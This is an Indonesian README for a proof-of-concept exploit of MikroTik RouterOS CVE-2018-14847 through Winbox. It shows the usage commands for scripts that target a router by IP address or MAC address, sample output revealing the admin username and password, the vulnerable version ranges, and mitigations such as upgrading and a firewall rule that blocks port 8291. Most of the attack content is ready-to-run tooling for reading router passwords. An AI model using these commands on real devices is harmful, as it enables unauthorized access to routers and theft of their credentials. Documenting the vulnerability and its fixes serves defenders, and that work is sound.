Mikrotik Login Exploit

PoC (Proof of Concept) dari vulnerability mikrotik CVE-2018-14847 (terutama pada winbox), memiliki cara kerja membaca password langsung dari RouterOS pada port default 8291.

Original by: https://github.com/BigNerd95/

Requirements

• Python 3+

Instalasi pada Linux

apt install python3

Contoh Penggunaan

WinBox (TCP/IP)

python3 WinboxExploit.py <IP-ADDRESS> [PORT]

e.g:

$ python3 WinboxExploit.py 192.168.1.1
Connected to 192.168.1.1:8291
Exploit successful
User: admin
Pass: oppaidaisuki123

Menggunakan MAC Address

Anda bisa menggunakan script ini walau tanpa IP address.

Gunakan MACServerDiscovery.py untuk scan router.

python3 MACServerDiscover.py

e.g:

$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

Exploitasi:

python3 MACServerExploit.py <MAC-ADDRESS>

e.g:

$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: oppaidaisuki123

Vulnerable Versions

RouterOS keluaran 2015-05-28 s/d 2018-04-20

RouterOS versions:

• Longterm: 6.30.1 - 6.40.7
• Stable: 6.29 - 6.42
• Beta: 6.29rc1 - 6.43rc3

Info selengkapnya : https://blog.mikrotik.com/security/winbox-vulnerability.html

Pencegahan Exploit

• Upgrade RouterOS ke 6.42+
• Nonaktifkan Winbox
• Blok service:

/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16

• Filter Rules (ACL), blok port 8291:

/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop

• Batasi akses login winbox dari MAC Adress:

/tool mac-server mac-winbox